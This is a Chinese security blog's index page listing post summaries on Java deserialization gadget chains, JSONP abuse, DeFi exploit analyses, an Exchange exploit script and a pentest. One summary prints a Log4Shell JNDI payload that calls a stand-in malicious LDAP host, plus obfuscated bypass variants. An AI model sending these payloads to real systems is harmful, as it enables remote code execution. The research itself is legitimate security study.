摘要: YSO CC链的研究与衍生 0x00 近期重新对yso里面的CC链进行重新研究分析,得出一些新的心得以及一些链的优化和衍生用法。 0x01 在对yso攻击链的分析当中,最有用的资料莫过于在每个payload的最上面的调用链方式。如cc1: /* Gadget chain: ObjectInputSt 阅读全文
posted @ 2022-10-18 10:49 ph4nt0mer 阅读(119) 评论(0) 推荐(0) 编辑
摘要: jsonp是为了解决什么问题 在互联网通信过程中,ajax请求受同源策略影响,不允许进行跨域请求,而script标签src属性中的链接却可以访问跨域的js脚本,利用这个特性,服务端不再返回JSON格式的数据,而是返回一段调用某个函数的js代码,在src中进行了调用,这样实现了跨域。 当html源码里 阅读全文
posted @ 2022-07-31 23:23 ph4nt0mer 阅读(1380) 评论(0) 推荐(0) 编辑
摘要: 信息安全人员, 技术栈: [X] JAVA [X] python [X] VUE2 [ ] VUE3 [X] ES6 [X] typescript [X] Docker [X] Golang [X] C/C++ 联系方式:rootphantomy#hotmail.com 阅读全文
posted @ 2022-07-31 23:19 ph4nt0mer 阅读(152) 评论(0) 推荐(0) 编辑
摘要: 问题发现 笔者在一次编写一个任意文件读取的poc插件的时候,发现使用burp重放包功能可以很方便的复现漏洞,但是使用python编写的*.py脚本却如何也无法成功输出success的结果。再次查看python的脚本,陷入了久久的沉思,难道就这2行requests的发包代码,我都能写错? 代码环境问题 阅读全文
posted @ 2022-01-24 16:00 ph4nt0mer 阅读(103) 评论(0) 推荐(0) 编辑
摘要: 原来的poc: ${jndi:ldap://malicious-ldap-server.com/a} 绕过的poc: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a} 可行 ${jndi:${lo 阅读全文
posted @ 2021-12-17 11:35 ph4nt0mer 阅读(3411) 评论(0) 推荐(0) 编辑
摘要: 先抛出攻击者地址: 0x6c9f2b95ca3432e5ec5bcd9c19de0636a23a4994 Txn hash交易: 0xac8a739c1f668b13d065d56a03c37a686e0aa1c9339e79fcbc5a2d0a6311e333 根据攻击者的交易可以看到0xae0f 阅读全文
posted @ 2021-08-31 16:09 ph4nt0mer 阅读(205) 评论(0) 推荐(0) 编辑
摘要: 下方是一个常规的 复投调用脚本。 脚本使用的是moonpots项目里pots池子合约的Compound功能,是pots stake,earn pots的部分重新复投进pots池子里。 下一篇会分享一个调用非开源合约的python脚本。 from time import time from eth_t 阅读全文
posted @ 2021-08-31 15:57 ph4nt0mer 阅读(1143) 评论(0) 推荐(0) 编辑
摘要: #梅林矿池当天被攻击了两次,我们只分析第一次攻击,因为第二次攻击的方法太沙雕了 北京时间UTF+8 14点30分,bsc生态链上的defi机枪池-merlin发生了黑客大量铸造梅林代币,然后抛售,导致梅林币价短时间内在50u-25u之间上下窜动。根据tg项目群里的相关消息,对此次事件进行了追踪和研究 阅读全文
posted @ 2021-05-27 10:14 ph4nt0mer 阅读(275) 评论(1) 推荐(0) 编辑
摘要: exchange2013会有点问题 ''' Author: Udyz Reference: - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 - https://raw.githubusercontent.com 阅读全文
posted @ 2021-03-15 09:57 ph4nt0mer 阅读(797) 评论(0) 推荐(0) 编辑
摘要: 0x00 360Quake牛刀小试 在对某厂商进行授权安全测试时,苦于寻找资产,于是利用360quake的title搜索语法进行搜索边缘资产。 搜到疑似该厂商的一个边缘站点。根据经验,像这种界面的系统一般多多少少都有漏洞。 因为站点只有一个后台界面,所以我们的漏洞利用点一般先是寻找爆破弱口令账户,或 阅读全文
posted @ 2021-01-08 10:43 ph4nt0mer 阅读(1569) 评论(0) 推荐(0) 编辑